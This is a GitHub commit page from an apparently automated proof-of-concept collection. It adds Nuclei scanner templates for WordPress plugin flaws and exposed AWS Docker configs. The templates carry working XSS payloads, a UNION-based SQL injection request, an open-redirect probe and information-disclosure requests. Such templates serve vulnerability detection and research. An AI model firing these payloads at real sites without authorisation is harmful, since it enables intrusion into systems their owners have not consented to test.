Skip to content

Commit

Permalink
20241219
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Dec 19, 2024
1 parent 7209f40 commit d9f1761
Show file tree
Hide file tree
Showing 93 changed files with 5,144 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20241218
20241219
91 changes: 91 additions & 0 deletions poc.txt

Large diffs are not rendered by default.

59 changes: 59 additions & 0 deletions poc/auth/accept-authorize-net-payments-using-contact-form-7.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: accept-authorize-net-payments-using-contact-form-7-236bcbdbfe25f4f674ac30a10158deed

info:
name: >
Accept Authorize.NET Payments Using Contact Form 7 <= 2.2 - Unauthenticated Information Exposure
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d8801b9a-afcb-483b-a018-4f68448e96de?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/"
google-query: inurl:"/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,accept-authorize-net-payments-using-contact-form-7,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "accept-authorize-net-payments-using-contact-form-7"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 2.2')
17 changes: 17 additions & 0 deletions poc/aws/amazon-docker-config-exposure.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
id: amazon-docker-config-disclosure

info:
name: Dockerrun AWS Configuration Exposure
author: pd-team
severity: medium

requests:
- method: GET
path:
- '{{BaseURL}}/Dockerrun.aws.json'
matchers:
- type: word
words:
- 'AWSEBDockerrunVersion'
- 'containerDefinitions'
condition: and
17 changes: 17 additions & 0 deletions poc/config/amazon-docker-config-exposure.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
id: amazon-docker-config-disclosure

info:
name: Dockerrun AWS Configuration Exposure
author: pd-team
severity: medium

requests:
- method: GET
path:
- '{{BaseURL}}/Dockerrun.aws.json'
matchers:
- type: word
words:
- 'AWSEBDockerrunVersion'
- 'containerDefinitions'
condition: and
30 changes: 30 additions & 0 deletions poc/cve/CVE-2012-0901-2139.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2012-0901

info:
name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901


requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
37 changes: 37 additions & 0 deletions poc/cve/CVE-2014-4544-2362.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,37 @@
id: CVE-2014-4544

info:
name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability.
reference:
- https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
- https://nvd.nist.gov/vuln/detail/CVE-2014-4544

classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4544
cwe-id: CWE-79

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
43 changes: 43 additions & 0 deletions poc/cve/CVE-2021-24750-5763.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,43 @@
id: CVE-2021-24750

info:
name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
author: cckuakilong
severity: high
description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks.
reference:
- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
- https://nvd.nist.gov/vuln/detail/CVE-2021-24750
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-24750
cwe-id: CWE-89
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated

requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "266f89556d2b38ff067b580fb305c522"

- type: status
status:
- 200
26 changes: 26 additions & 0 deletions poc/cve/CVE-2021-25111-5801.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
id: CVE-2021-25111

info:
name: English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect
author: akincibor
severity: medium
description: The plugin does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue.
reference:
- https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4
tags: wp-plugin,redirect,wordpress,wp,cve,cve2021,unauth
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-25111
cwe-id: CWE-601

requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"

matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
51 changes: 51 additions & 0 deletions poc/cve/CVE-2021-38314-6300.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,51 @@
id: CVE-2021-38314

info:
name: Redux Framework - Unauthenticated Sensitive Information Disclosure
author: meme-lord
severity: medium
reference:
- https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/
- https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c
- https://blog.sorcery.ie/posts/redux_wordpress/

classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-38314
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."

requests:
- raw:
- |
GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "len(body)<50"

- type: regex
name: meme
regex:
- '[a-f0-9]{32}'
part: body

- type: status
status:
- 200

extractors:
- type: regex
part: body
regex:
- "[a-f0-9]{32}"
52 changes: 52 additions & 0 deletions poc/cve/CVE-2021-39322-6339.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,52 @@
id: CVE-2021-39322

info:
name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.
reference:
- https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58
- https://nvd.nist.gov/vuln/detail/CVE-2021-39322
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322
- https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-39322
cwe-id: CWE-79
tags: wordpress,cve,cve2021,wp-plugin,authenticated

requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'

- type: status
status:
- 200

- type: word
part: header
words:
- "text/html"

# Enhanced by mp on 2022/03/23
Loading

0 comments on commit d9f1761

Please sign in to comment.